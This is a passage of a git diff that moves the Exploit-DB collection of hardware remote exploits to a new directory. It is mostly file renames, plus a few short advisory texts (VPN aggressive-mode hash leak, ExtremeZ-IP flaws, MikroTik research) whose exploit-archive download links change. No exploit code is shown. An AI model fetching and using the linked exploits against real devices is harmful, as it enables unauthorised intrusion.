index 100% rename from platforms/hardware/remote/22319.txt rename to exploits/hardware/remote/22319.txt diff --git a/platforms/hardware/remote/22350.txt b/exploits/hardware/remote/22350.txt similarity index 100% rename from platforms/hardware/remote/22350.txt rename to exploits/hardware/remote/22350.txt diff --git a/platforms/hardware/remote/22394.txt b/exploits/hardware/remote/22394.txt similarity index 100% rename from platforms/hardware/remote/22394.txt rename to exploits/hardware/remote/22394.txt diff --git a/platforms/hardware/remote/22416.txt b/exploits/hardware/remote/22416.txt similarity index 100% rename from platforms/hardware/remote/22416.txt rename to exploits/hardware/remote/22416.txt diff --git a/platforms/hardware/remote/22453.txt b/exploits/hardware/remote/22453.txt similarity index 100% rename from platforms/hardware/remote/22453.txt rename to exploits/hardware/remote/22453.txt diff --git a/platforms/hardware/remote/22455.txt b/exploits/hardware/remote/22455.txt similarity index 100% rename from platforms/hardware/remote/22455.txt rename to exploits/hardware/remote/22455.txt diff --git a/platforms/hardware/remote/22480.txt b/exploits/hardware/remote/22480.txt similarity index 100% rename from platforms/hardware/remote/22480.txt rename to exploits/hardware/remote/22480.txt diff --git a/platforms/hardware/remote/22532.txt b/exploits/hardware/remote/22532.txt similarity index 92% rename from platforms/hardware/remote/22532.txt rename to exploits/hardware/remote/22532.txt index 25ef69bef..a7fec892b 100644 --- a/platforms/hardware/remote/22532.txt +++ b/exploits/hardware/remote/22532.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7423/info When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22532.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22532.tar.gz \ No newline at end of file diff --git a/platforms/hardware/remote/22533.txt b/exploits/hardware/remote/22533.txt similarity index 100% rename from platforms/hardware/remote/22533.txt rename to exploits/hardware/remote/22533.txt diff --git a/platforms/hardware/remote/22626.txt b/exploits/hardware/remote/22626.txt similarity index 100% rename from platforms/hardware/remote/22626.txt rename to exploits/hardware/remote/22626.txt diff --git a/platforms/hardware/remote/22898.txt b/exploits/hardware/remote/22898.txt similarity index 100% rename from platforms/hardware/remote/22898.txt rename to exploits/hardware/remote/22898.txt diff --git a/platforms/hardware/remote/23212.txt b/exploits/hardware/remote/23212.txt similarity index 92% rename from platforms/hardware/remote/23212.txt rename to exploits/hardware/remote/23212.txt index 3054c4c31..5db86eb94 100644 --- a/platforms/hardware/remote/23212.txt +++ b/exploits/hardware/remote/23212.txt @@ -5,4 +5,4 @@ Authentication Protocol) is prone to a password disclosure weakness that may all Successful exploitation of this weakness may allow a remote attacker to steal authentication information, potentially allowing for unauthorized network access. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23212.tar.bz2 \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23212.tar.bz2 \ No newline at end of file diff --git a/platforms/hardware/remote/23317.txt b/exploits/hardware/remote/23317.txt similarity index 100% rename from platforms/hardware/remote/23317.txt rename to exploits/hardware/remote/23317.txt diff --git a/platforms/hardware/remote/23376.txt b/exploits/hardware/remote/23376.txt similarity index 100% rename from platforms/hardware/remote/23376.txt rename to exploits/hardware/remote/23376.txt diff --git a/platforms/hardware/remote/23377.txt b/exploits/hardware/remote/23377.txt similarity index 100% rename from platforms/hardware/remote/23377.txt rename to exploits/hardware/remote/23377.txt diff --git a/platforms/hardware/remote/23378.txt b/exploits/hardware/remote/23378.txt similarity index 100% rename from platforms/hardware/remote/23378.txt rename to exploits/hardware/remote/23378.txt diff --git a/platforms/hardware/remote/23379.txt b/exploits/hardware/remote/23379.txt similarity index 100% rename from platforms/hardware/remote/23379.txt rename to exploits/hardware/remote/23379.txt diff --git a/platforms/hardware/remote/23527.txt b/exploits/hardware/remote/23527.txt similarity index 100% rename from platforms/hardware/remote/23527.txt rename to exploits/hardware/remote/23527.txt diff --git a/platforms/hardware/remote/23528.txt b/exploits/hardware/remote/23528.txt similarity index 100% rename from platforms/hardware/remote/23528.txt rename to exploits/hardware/remote/23528.txt diff --git a/platforms/hardware/remote/23545.txt b/exploits/hardware/remote/23545.txt similarity index 100% rename from platforms/hardware/remote/23545.txt rename to exploits/hardware/remote/23545.txt diff --git a/platforms/hardware/remote/23721.txt b/exploits/hardware/remote/23721.txt similarity index 100% rename from platforms/hardware/remote/23721.txt rename to exploits/hardware/remote/23721.txt diff --git a/platforms/hardware/remote/23735.py b/exploits/hardware/remote/23735.py similarity index 100% rename from platforms/hardware/remote/23735.py rename to exploits/hardware/remote/23735.py diff --git a/platforms/hardware/remote/23764.txt b/exploits/hardware/remote/23764.txt similarity index 100% rename from platforms/hardware/remote/23764.txt rename to exploits/hardware/remote/23764.txt diff --git a/platforms/hardware/remote/23808.txt b/exploits/hardware/remote/23808.txt similarity index 100% rename from platforms/hardware/remote/23808.txt rename to exploits/hardware/remote/23808.txt diff --git a/platforms/hardware/remote/23855.txt b/exploits/hardware/remote/23855.txt similarity index 100% rename from platforms/hardware/remote/23855.txt rename to exploits/hardware/remote/23855.txt diff --git a/platforms/hardware/remote/24065.java b/exploits/hardware/remote/24065.java similarity index 100% rename from platforms/hardware/remote/24065.java rename to exploits/hardware/remote/24065.java diff --git a/platforms/hardware/remote/24115.c b/exploits/hardware/remote/24115.c similarity index 100% rename from platforms/hardware/remote/24115.c rename to exploits/hardware/remote/24115.c diff --git a/platforms/hardware/remote/24140.txt b/exploits/hardware/remote/24140.txt similarity index 100% rename from platforms/hardware/remote/24140.txt rename to exploits/hardware/remote/24140.txt diff --git a/platforms/hardware/remote/24226.txt b/exploits/hardware/remote/24226.txt similarity index 100% rename from platforms/hardware/remote/24226.txt rename to exploits/hardware/remote/24226.txt diff --git a/platforms/hardware/remote/24230.txt b/exploits/hardware/remote/24230.txt similarity index 100% rename from platforms/hardware/remote/24230.txt rename to exploits/hardware/remote/24230.txt diff --git a/platforms/hardware/remote/24494.rb b/exploits/hardware/remote/24494.rb similarity index 100% rename from platforms/hardware/remote/24494.rb rename to exploits/hardware/remote/24494.rb diff --git a/platforms/hardware/remote/24681.txt b/exploits/hardware/remote/24681.txt similarity index 100% rename from platforms/hardware/remote/24681.txt rename to exploits/hardware/remote/24681.txt diff --git a/platforms/hardware/remote/24760.txt b/exploits/hardware/remote/24760.txt similarity index 100% rename from platforms/hardware/remote/24760.txt rename to exploits/hardware/remote/24760.txt diff --git a/platforms/hardware/remote/24892.txt b/exploits/hardware/remote/24892.txt similarity index 100% rename from platforms/hardware/remote/24892.txt rename to exploits/hardware/remote/24892.txt diff --git a/platforms/hardware/remote/24931.rb b/exploits/hardware/remote/24931.rb similarity index 100% rename from platforms/hardware/remote/24931.rb rename to exploits/hardware/remote/24931.rb diff --git a/platforms/hardware/remote/24936.rb b/exploits/hardware/remote/24936.rb similarity index 100% rename from platforms/hardware/remote/24936.rb rename to exploits/hardware/remote/24936.rb diff --git a/platforms/hardware/remote/24945.rb b/exploits/hardware/remote/24945.rb similarity index 100% rename from platforms/hardware/remote/24945.rb rename to exploits/hardware/remote/24945.rb diff --git a/platforms/hardware/remote/24956.rb b/exploits/hardware/remote/24956.rb similarity index 100% rename from platforms/hardware/remote/24956.rb rename to exploits/hardware/remote/24956.rb diff --git a/platforms/hardware/remote/24974.rb b/exploits/hardware/remote/24974.rb similarity index 100% rename from platforms/hardware/remote/24974.rb rename to exploits/hardware/remote/24974.rb diff --git a/platforms/hardware/remote/25359.txt b/exploits/hardware/remote/25359.txt similarity index 100% rename from platforms/hardware/remote/25359.txt rename to exploits/hardware/remote/25359.txt diff --git a/platforms/hardware/remote/254.c b/exploits/hardware/remote/254.c similarity index 100% rename from platforms/hardware/remote/254.c rename to exploits/hardware/remote/254.c diff --git a/platforms/hardware/remote/25608.rb b/exploits/hardware/remote/25608.rb similarity index 100% rename from platforms/hardware/remote/25608.rb rename to exploits/hardware/remote/25608.rb diff --git a/platforms/hardware/remote/25609.rb b/exploits/hardware/remote/25609.rb similarity index 100% rename from platforms/hardware/remote/25609.rb rename to exploits/hardware/remote/25609.rb diff --git a/platforms/hardware/remote/25684.html b/exploits/hardware/remote/25684.html similarity index 100% rename from platforms/hardware/remote/25684.html rename to exploits/hardware/remote/25684.html diff --git a/platforms/hardware/remote/25949.pl b/exploits/hardware/remote/25949.pl similarity index 100% rename from platforms/hardware/remote/25949.pl rename to exploits/hardware/remote/25949.pl diff --git a/platforms/hardware/remote/25966.txt b/exploits/hardware/remote/25966.txt similarity index 100% rename from platforms/hardware/remote/25966.txt rename to exploits/hardware/remote/25966.txt diff --git a/platforms/hardware/remote/25987.txt b/exploits/hardware/remote/25987.txt similarity index 100% rename from platforms/hardware/remote/25987.txt rename to exploits/hardware/remote/25987.txt diff --git a/platforms/hardware/remote/26022.txt b/exploits/hardware/remote/26022.txt similarity index 100% rename from platforms/hardware/remote/26022.txt rename to exploits/hardware/remote/26022.txt diff --git a/platforms/hardware/remote/26075.txt b/exploits/hardware/remote/26075.txt similarity index 100% rename from platforms/hardware/remote/26075.txt rename to exploits/hardware/remote/26075.txt diff --git a/platforms/hardware/remote/26168.txt b/exploits/hardware/remote/26168.txt similarity index 100% rename from platforms/hardware/remote/26168.txt rename to exploits/hardware/remote/26168.txt diff --git a/platforms/hardware/remote/26318.py b/exploits/hardware/remote/26318.py similarity index 100% rename from platforms/hardware/remote/26318.py rename to exploits/hardware/remote/26318.py diff --git a/platforms/hardware/remote/2638.c b/exploits/hardware/remote/2638.c similarity index 100% rename from platforms/hardware/remote/2638.c rename to exploits/hardware/remote/2638.c diff --git a/platforms/hardware/remote/26412.pl b/exploits/hardware/remote/26412.pl similarity index 100% rename from platforms/hardware/remote/26412.pl rename to exploits/hardware/remote/26412.pl diff --git a/platforms/hardware/remote/27044.rb b/exploits/hardware/remote/27044.rb similarity index 100% rename from platforms/hardware/remote/27044.rb rename to exploits/hardware/remote/27044.rb diff --git a/platforms/hardware/remote/27203.pl b/exploits/hardware/remote/27203.pl similarity index 100% rename from platforms/hardware/remote/27203.pl rename to exploits/hardware/remote/27203.pl diff --git a/platforms/hardware/remote/27319.txt b/exploits/hardware/remote/27319.txt similarity index 100% rename from platforms/hardware/remote/27319.txt rename to exploits/hardware/remote/27319.txt diff --git a/platforms/hardware/remote/27428.rb b/exploits/hardware/remote/27428.rb similarity index 100% rename from platforms/hardware/remote/27428.rb rename to exploits/hardware/remote/27428.rb diff --git a/platforms/hardware/remote/27452.txt b/exploits/hardware/remote/27452.txt similarity index 100% rename from platforms/hardware/remote/27452.txt rename to exploits/hardware/remote/27452.txt diff --git a/platforms/hardware/remote/27528.rb b/exploits/hardware/remote/27528.rb similarity index 100% rename from platforms/hardware/remote/27528.rb rename to exploits/hardware/remote/27528.rb diff --git a/platforms/hardware/remote/27706.txt b/exploits/hardware/remote/27706.txt similarity index 100% rename from platforms/hardware/remote/27706.txt rename to exploits/hardware/remote/27706.txt diff --git a/platforms/hardware/remote/27830.java b/exploits/hardware/remote/27830.java similarity index 100% rename from platforms/hardware/remote/27830.java rename to exploits/hardware/remote/27830.java diff --git a/platforms/hardware/remote/27873.txt b/exploits/hardware/remote/27873.txt similarity index 100% rename from platforms/hardware/remote/27873.txt rename to exploits/hardware/remote/27873.txt diff --git a/platforms/hardware/remote/27891.txt b/exploits/hardware/remote/27891.txt similarity index 100% rename from platforms/hardware/remote/27891.txt rename to exploits/hardware/remote/27891.txt diff --git a/platforms/hardware/remote/27892.txt b/exploits/hardware/remote/27892.txt similarity index 100% rename from platforms/hardware/remote/27892.txt rename to exploits/hardware/remote/27892.txt diff --git a/platforms/hardware/remote/27893.txt b/exploits/hardware/remote/27893.txt similarity index 100% rename from platforms/hardware/remote/27893.txt rename to exploits/hardware/remote/27893.txt diff --git a/platforms/hardware/remote/27894.txt b/exploits/hardware/remote/27894.txt similarity index 100% rename from platforms/hardware/remote/27894.txt rename to exploits/hardware/remote/27894.txt diff --git a/platforms/hardware/remote/27923.txt b/exploits/hardware/remote/27923.txt similarity index 100% rename from platforms/hardware/remote/27923.txt rename to exploits/hardware/remote/27923.txt diff --git a/platforms/hardware/remote/28056.txt b/exploits/hardware/remote/28056.txt similarity index 95% rename from platforms/hardware/remote/28056.txt rename to exploits/hardware/remote/28056.txt index 3923bb9a3..a76620b38 100644 --- a/platforms/hardware/remote/28056.txt +++ b/exploits/hardware/remote/28056.txt @@ -13,4 +13,4 @@ Shodanhq.com shows >290.000 entries for the ROSSSH search term. The 50 megs Mikrotik package including the all research items can be downloaded here: http://www.farlight.org/mikropackage.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28056.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28056.zip \ No newline at end of file diff --git a/platforms/hardware/remote/28245.pl b/exploits/hardware/remote/28245.pl similarity index 100% rename from platforms/hardware/remote/28245.pl rename to exploits/hardware/remote/28245.pl diff --git a/platforms/hardware/remote/28450.py b/exploits/hardware/remote/28450.py similarity index 100% rename from platforms/hardware/remote/28450.py rename to exploits/hardware/remote/28450.py diff --git a/platforms/hardware/remote/28484.rb b/exploits/hardware/remote/28484.rb similarity index 100% rename from platforms/hardware/remote/28484.rb rename to exploits/hardware/remote/28484.rb diff --git a/platforms/hardware/remote/28508.rb b/exploits/hardware/remote/28508.rb similarity index 100% rename from platforms/hardware/remote/28508.rb rename to exploits/hardware/remote/28508.rb diff --git a/platforms/hardware/remote/28847.txt b/exploits/hardware/remote/28847.txt similarity index 100% rename from platforms/hardware/remote/28847.txt rename to exploits/hardware/remote/28847.txt diff --git a/platforms/hardware/remote/28848.txt b/exploits/hardware/remote/28848.txt similarity index 100% rename from platforms/hardware/remote/28848.txt rename to exploits/hardware/remote/28848.txt diff --git a/platforms/hardware/remote/28888.txt b/exploits/hardware/remote/28888.txt similarity index 100% rename from platforms/hardware/remote/28888.txt rename to exploits/hardware/remote/28888.txt diff --git a/platforms/hardware/remote/29127.rb b/exploits/hardware/remote/29127.rb similarity index 100% rename from platforms/hardware/remote/29127.rb rename to exploits/hardware/remote/29127.rb diff --git a/platforms/hardware/remote/29273.pl b/exploits/hardware/remote/29273.pl similarity index 100% rename from platforms/hardware/remote/29273.pl rename to exploits/hardware/remote/29273.pl diff --git a/platforms/hardware/remote/294.pl b/exploits/hardware/remote/294.pl similarity index 100% rename from platforms/hardware/remote/294.pl rename to exploits/hardware/remote/294.pl diff --git a/platforms/hardware/remote/29666.rb b/exploits/hardware/remote/29666.rb similarity index 100% rename from platforms/hardware/remote/29666.rb rename to exploits/hardware/remote/29666.rb diff --git a/platforms/hardware/remote/29735.rb b/exploits/hardware/remote/29735.rb similarity index 100% rename from platforms/hardware/remote/29735.rb rename to exploits/hardware/remote/29735.rb diff --git a/platforms/hardware/remote/29815.rb b/exploits/hardware/remote/29815.rb similarity index 100% rename from platforms/hardware/remote/29815.rb rename to exploits/hardware/remote/29815.rb diff --git a/platforms/hardware/remote/29945.txt b/exploits/hardware/remote/29945.txt similarity index 100% rename from platforms/hardware/remote/29945.txt rename to exploits/hardware/remote/29945.txt diff --git a/platforms/hardware/remote/30164.txt b/exploits/hardware/remote/30164.txt similarity index 100% rename from platforms/hardware/remote/30164.txt rename to exploits/hardware/remote/30164.txt diff --git a/platforms/hardware/remote/30254.txt b/exploits/hardware/remote/30254.txt similarity index 100% rename from platforms/hardware/remote/30254.txt rename to exploits/hardware/remote/30254.txt diff --git a/platforms/hardware/remote/30485.html b/exploits/hardware/remote/30485.html similarity index 100% rename from platforms/hardware/remote/30485.html rename to exploits/hardware/remote/30485.html diff --git a/platforms/hardware/remote/30650.txt b/exploits/hardware/remote/30650.txt similarity index 100% rename from platforms/hardware/remote/30650.txt rename to exploits/hardware/remote/30650.txt diff --git a/platforms/hardware/remote/30652.txt b/exploits/hardware/remote/30652.txt similarity index 100% rename from platforms/hardware/remote/30652.txt rename to exploits/hardware/remote/30652.txt diff --git a/platforms/hardware/remote/30673.txt b/exploits/hardware/remote/30673.txt similarity index 100% rename from platforms/hardware/remote/30673.txt rename to exploits/hardware/remote/30673.txt diff --git a/platforms/hardware/remote/30740.html b/exploits/hardware/remote/30740.html similarity index 100% rename from platforms/hardware/remote/30740.html rename to exploits/hardware/remote/30740.html diff --git a/platforms/hardware/remote/30755.txt b/exploits/hardware/remote/30755.txt similarity index 100% rename from platforms/hardware/remote/30755.txt rename to exploits/hardware/remote/30755.txt diff --git a/platforms/hardware/remote/30833.html b/exploits/hardware/remote/30833.html similarity index 100% rename from platforms/hardware/remote/30833.html rename to exploits/hardware/remote/30833.html diff --git a/platforms/hardware/remote/30834.txt b/exploits/hardware/remote/30834.txt similarity index 100% rename from platforms/hardware/remote/30834.txt rename to exploits/hardware/remote/30834.txt diff --git a/platforms/hardware/remote/30882.txt b/exploits/hardware/remote/30882.txt similarity index 100% rename from platforms/hardware/remote/30882.txt rename to exploits/hardware/remote/30882.txt diff --git a/platforms/hardware/remote/30915.rb b/exploits/hardware/remote/30915.rb similarity index 100% rename from platforms/hardware/remote/30915.rb rename to exploits/hardware/remote/30915.rb diff --git a/platforms/hardware/remote/30935.txt b/exploits/hardware/remote/30935.txt similarity index 100% rename from platforms/hardware/remote/30935.txt rename to exploits/hardware/remote/30935.txt diff --git a/platforms/hardware/remote/31013.txt b/exploits/hardware/remote/31013.txt similarity index 100% rename from platforms/hardware/remote/31013.txt rename to exploits/hardware/remote/31013.txt diff --git a/platforms/hardware/remote/31024.txt b/exploits/hardware/remote/31024.txt similarity index 100% rename from platforms/hardware/remote/31024.txt rename to exploits/hardware/remote/31024.txt diff --git a/platforms/hardware/remote/31026.pl b/exploits/hardware/remote/31026.pl similarity index 100% rename from platforms/hardware/remote/31026.pl rename to exploits/hardware/remote/31026.pl diff --git a/platforms/hardware/remote/31031.txt b/exploits/hardware/remote/31031.txt similarity index 100% rename from platforms/hardware/remote/31031.txt rename to exploits/hardware/remote/31031.txt diff --git a/platforms/hardware/remote/31033.py b/exploits/hardware/remote/31033.py similarity index 100% rename from platforms/hardware/remote/31033.py rename to exploits/hardware/remote/31033.py diff --git a/platforms/hardware/remote/31078.txt b/exploits/hardware/remote/31078.txt similarity index 100% rename from platforms/hardware/remote/31078.txt rename to exploits/hardware/remote/31078.txt diff --git a/platforms/hardware/remote/31132.txt b/exploits/hardware/remote/31132.txt similarity index 91% rename from platforms/hardware/remote/31132.txt rename to exploits/hardware/remote/31132.txt index 01a5d5a0f..5a530e411 100644 --- a/platforms/hardware/remote/31132.txt +++ b/exploits/hardware/remote/31132.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to cause denial-of-service conditions or to o These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31132.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31132.zip \ No newline at end of file diff --git a/platforms/hardware/remote/31133.txt b/exploits/hardware/remote/31133.txt similarity index 100% rename from platforms/hardware/remote/31133.txt rename to exploits/hardware/remote/31133.txt diff --git a/platforms/hardware/remote/31298.txt b/exploits/hardware/remote/31298.txt similarity index 100% rename from platforms/hardware/remote/31298.txt rename to exploits/hardware/remote/31298.txt diff --git a/platforms/hardware/remote/31311.txt b/exploits/hardware/remote/31311.txt similarity index 100% rename from platforms/hardware/remote/31311.txt rename to exploits/hardware/remote/31311.txt diff --git a/platforms/hardware/remote/31340.html b/exploits/hardware/remote/31340.html similarity index 100% rename from platforms/hardware/remote/31340.html rename to exploits/hardware/remote/31340.html diff --git a/platforms/hardware/remote/31342.txt b/exploits/hardware/remote/31342.txt similarity index 100% rename from platforms/hardware/remote/31342.txt rename to exploits/hardware/remote/31342.txt diff --git a/platforms/hardware/remote/31364.txt b/exploits/hardware/remote/31364.txt similarity index 100% rename from platforms/hardware/remote/31364.txt rename to exploits/hardware/remote/31364.txt diff --git a/platforms/hardware/remote/31519.rb b/exploits/hardware/remote/31519.rb similarity index 100% rename from platforms/hardware/remote/31519.rb rename to exploits/hardware/remote/31519.rb diff --git a/platforms/hardware/remote/31683.php b/exploits/hardware/remote/31683.php similarity index 100% rename from platforms/hardware/remote/31683.php rename to exploits/hardware/remote/31683.php diff --git a/platforms/hardware/remote/31698.txt b/exploits/hardware/remote/31698.txt similarity index 100% rename from platforms/hardware/remote/31698.txt rename to exploits/hardware/remote/31698.txt diff --git a/platforms/hardware/remote/31758.py b/exploits/hardware/remote/31758.py similarity index 100% rename from platforms/hardware/remote/31758.py rename to exploits/hardware/remote/31758.py diff --git a/platforms/hardware/remote/31828.txt b/exploits/hardware/remote/31828.txt similarity index 100% rename from platforms/hardware/remote/31828.txt rename to exploits/hardware/remote/31828.txt diff --git a/platforms/hardware/remote/31862.txt b/exploits/hardware/remote/31862.txt similarity index 100% rename from platforms/hardware/remote/31862.txt rename to exploits/hardware/remote/31862.txt diff --git a/platforms/hardware/remote/31863.txt b/exploits/hardware/remote/31863.txt similarity index 100% rename from platforms/hardware/remote/31863.txt rename to exploits/hardware/remote/31863.txt diff --git a/platforms/hardware/remote/31864.txt b/exploits/hardware/remote/31864.txt similarity index 100% rename from platforms/hardware/remote/31864.txt rename to exploits/hardware/remote/31864.txt diff --git a/platforms/hardware/remote/31885.txt b/exploits/hardware/remote/31885.txt similarity index 100% rename from platforms/hardware/remote/31885.txt rename to exploits/hardware/remote/31885.txt diff --git a/platforms/hardware/remote/31886.txt b/exploits/hardware/remote/31886.txt similarity index 100% rename from platforms/hardware/remote/31886.txt rename to exploits/hardware/remote/31886.txt diff --git a/platforms/hardware/remote/3189.sh b/exploits/hardware/remote/3189.sh similarity index 100% rename from platforms/hardware/remote/3189.sh rename to exploits/hardware/remote/3189.sh diff --git a/platforms/hardware/remote/32336.txt b/exploits/hardware/remote/32336.txt similarity index 100% rename from platforms/hardware/remote/32336.txt rename to exploits/hardware/remote/32336.txt diff --git a/platforms/hardware/remote/32390.html b/exploits/hardware/remote/32390.html similarity index 100% rename from platforms/hardware/remote/32390.html rename to exploits/hardware/remote/32390.html diff --git a/platforms/hardware/remote/32391.html b/exploits/hardware/remote/32391.html similarity index 100% rename from platforms/hardware/remote/32391.html rename to exploits/hardware/remote/32391.html diff --git a/platforms/hardware/remote/32440.rb b/exploits/hardware/remote/32440.rb similarity index 100% rename from platforms/hardware/remote/32440.rb rename to exploits/hardware/remote/32440.rb diff --git a/platforms/hardware/remote/32469.txt b/exploits/hardware/remote/32469.txt similarity index 100% rename from platforms/hardware/remote/32469.txt rename to exploits/hardware/remote/32469.txt diff --git a/platforms/hardware/remote/32552.txt b/exploits/hardware/remote/32552.txt similarity index 100% rename from platforms/hardware/remote/32552.txt rename to exploits/hardware/remote/32552.txt diff --git a/platforms/hardware/remote/32582.txt b/exploits/hardware/remote/32582.txt similarity index 100% rename from platforms/hardware/remote/32582.txt rename to exploits/hardware/remote/32582.txt diff --git a/platforms/hardware/remote/32591.txt b/exploits/hardware/remote/32591.txt similarity index 100% rename from platforms/hardware/remote/32591.txt rename to exploits/hardware/remote/32591.txt diff --git a/platforms/hardware/remote/32599.txt b/exploits/hardware/remote/32599.txt similarity index 100% rename from platforms/hardware/remote/32599.txt rename to exploits/hardware/remote/32599.txt diff --git a/platforms/hardware/remote/32681.txt b/exploits/hardware/remote/32681.txt similarity index 100% rename from platforms/hardware/remote/32681.txt rename to exploits/hardware/remote/32681.txt diff --git a/platforms/hardware/remote/32723.txt b/exploits/hardware/remote/32723.txt similarity index 100% rename from platforms/hardware/remote/32723.txt rename to exploits/hardware/remote/32723.txt diff --git a/platforms/hardware/remote/32743.txt b/exploits/hardware/remote/32743.txt similarity index 100% rename from platforms/hardware/remote/32743.txt rename to exploits/hardware/remote/32743.txt diff --git a/platforms/hardware/remote/32753.rb b/exploits/hardware/remote/32753.rb similarity index 100% rename from platforms/hardware/remote/32753.rb rename to exploits/hardware/remote/32753.rb diff --git a/platforms/hardware/remote/32776.txt b/exploits/hardware/remote/32776.txt similarity index 100% rename from platforms/hardware/remote/32776.txt rename to exploits/hardware/remote/32776.txt diff --git a/platforms/hardware/remote/32801.txt b/exploits/hardware/remote/32801.txt similarity index 100% rename from platforms/hardware/remote/32801.txt rename to exploits/hardware/remote/32801.txt diff --git a/platforms/hardware/remote/32878.txt b/exploits/hardware/remote/32878.txt similarity index 100% rename from platforms/hardware/remote/32878.txt rename to exploits/hardware/remote/32878.txt diff --git a/platforms/hardware/remote/32919.txt b/exploits/hardware/remote/32919.txt similarity index 100% rename from platforms/hardware/remote/32919.txt rename to exploits/hardware/remote/32919.txt diff --git a/platforms/hardware/remote/32931.html b/exploits/hardware/remote/32931.html similarity index 100% rename from platforms/hardware/remote/32931.html rename to exploits/hardware/remote/32931.html diff --git a/platforms/hardware/remote/32938.c b/exploits/hardware/remote/32938.c similarity index 100% rename from platforms/hardware/remote/32938.c rename to exploits/hardware/remote/32938.c diff --git a/platforms/hardware/remote/3294.txt b/exploits/hardware/remote/3294.txt similarity index 100% rename from platforms/hardware/remote/3294.txt rename to exploits/hardware/remote/3294.txt diff --git a/platforms/hardware/remote/32954.txt b/exploits/hardware/remote/32954.txt similarity index 100% rename from platforms/hardware/remote/32954.txt rename to exploits/hardware/remote/32954.txt diff --git a/platforms/hardware/remote/32955.js b/exploits/hardware/remote/32955.js similarity index 100% rename from platforms/hardware/remote/32955.js rename to exploits/hardware/remote/32955.js diff --git a/platforms/hardware/remote/33010.txt b/exploits/hardware/remote/33010.txt similarity index 100% rename from platforms/hardware/remote/33010.txt rename to exploits/hardware/remote/33010.txt diff --git a/platforms/hardware/remote/33016.txt b/exploits/hardware/remote/33016.txt similarity index 100% rename from platforms/hardware/remote/33016.txt rename to exploits/hardware/remote/33016.txt diff --git a/platforms/hardware/remote/33044.html b/exploits/hardware/remote/33044.html similarity index 100% rename from platforms/hardware/remote/33044.html rename to exploits/hardware/remote/33044.html diff --git a/platforms/hardware/remote/33045.html b/exploits/hardware/remote/33045.html similarity index 100% rename from platforms/hardware/remote/33045.html rename to exploits/hardware/remote/33045.html diff --git a/platforms/hardware/remote/33046.html b/exploits/hardware/remote/33046.html similarity index 100% rename from platforms/hardware/remote/33046.html rename to exploits/hardware/remote/33046.html diff --git a/platforms/hardware/remote/33054.txt b/exploits/hardware/remote/33054.txt similarity index 100% rename from platforms/hardware/remote/33054.txt rename to exploits/hardware/remote/33054.txt diff --git a/platforms/hardware/remote/33055.html b/exploits/hardware/remote/33055.html similarity index 100% rename from platforms/hardware/remote/33055.html rename to exploits/hardware/remote/33055.html diff --git a/platforms/hardware/remote/33143.rb b/exploits/hardware/remote/33143.rb similarity index 100% rename from platforms/hardware/remote/33143.rb rename to exploits/hardware/remote/33143.rb diff --git a/platforms/hardware/remote/33165.txt b/exploits/hardware/remote/33165.txt similarity index 100% rename from platforms/hardware/remote/33165.txt rename to exploits/hardware/remote/33165.txt diff --git a/platforms/hardware/remote/33177.txt b/exploits/hardware/remote/33177.txt similarity index 100% rename from platforms/hardware/remote/33177.txt rename to exploits/hardware/remote/33177.txt diff --git a/platforms/hardware/remote/33234.txt b/exploits/hardware/remote/33234.txt similarity index 100% rename from platforms/hardware/remote/33234.txt rename to exploits/hardware/remote/33234.txt diff --git a/platforms/hardware/remote/33257.txt b/exploits/hardware/remote/33257.txt similarity index 100% rename from platforms/hardware/remote/33257.txt rename to exploits/hardware/remote/33257.txt diff --git a/platforms/hardware/remote/33258.txt b/exploits/hardware/remote/33258.txt similarity index 100% rename from platforms/hardware/remote/33258.txt rename to exploits/hardware/remote/33258.txt diff --git a/platforms/hardware/remote/33259.txt b/exploits/hardware/remote/33259.txt similarity index 100% rename from platforms/hardware/remote/33259.txt rename to exploits/hardware/remote/33259.txt diff --git a/platforms/hardware/remote/33260.txt b/exploits/hardware/remote/33260.txt similarity index 100% rename from platforms/hardware/remote/33260.txt rename to exploits/hardware/remote/33260.txt diff --git a/platforms/hardware/remote/33261.txt b/exploits/hardware/remote/33261.txt similarity index 100% rename from platforms/hardware/remote/33261.txt rename to exploits/hardware/remote/33261.txt diff --git a/platforms/hardware/remote/33265.js b/exploits/hardware/remote/33265.js similarity index 100% rename from platforms/hardware/remote/33265.js rename to exploits/hardware/remote/33265.js diff --git a/platforms/hardware/remote/33423.txt b/exploits/hardware/remote/33423.txt similarity index 100% rename from platforms/hardware/remote/33423.txt rename to exploits/hardware/remote/33423.txt diff --git a/platforms/hardware/remote/33471.txt b/exploits/hardware/remote/33471.txt similarity index 100% rename from platforms/hardware/remote/33471.txt rename to exploits/hardware/remote/33471.txt diff --git a/platforms/hardware/remote/33567.txt b/exploits/hardware/remote/33567.txt similarity index 100% rename from platforms/hardware/remote/33567.txt rename to exploits/hardware/remote/33567.txt diff --git a/platforms/hardware/remote/33568.txt b/exploits/hardware/remote/33568.txt similarity index 100% rename from platforms/hardware/remote/33568.txt rename to exploits/hardware/remote/33568.txt diff --git a/platforms/hardware/remote/33580.txt b/exploits/hardware/remote/33580.txt similarity index 100% rename from platforms/hardware/remote/33580.txt rename to exploits/hardware/remote/33580.txt diff --git a/platforms/hardware/remote/33648.txt b/exploits/hardware/remote/33648.txt similarity index 100% rename from platforms/hardware/remote/33648.txt rename to exploits/hardware/remote/33648.txt diff --git a/platforms/hardware/remote/33739.txt b/exploits/hardware/remote/33739.txt similarity index 100% rename from platforms/hardware/remote/33739.txt rename to exploits/hardware/remote/33739.txt diff --git a/platforms/hardware/remote/33741.txt b/exploits/hardware/remote/33741.txt similarity 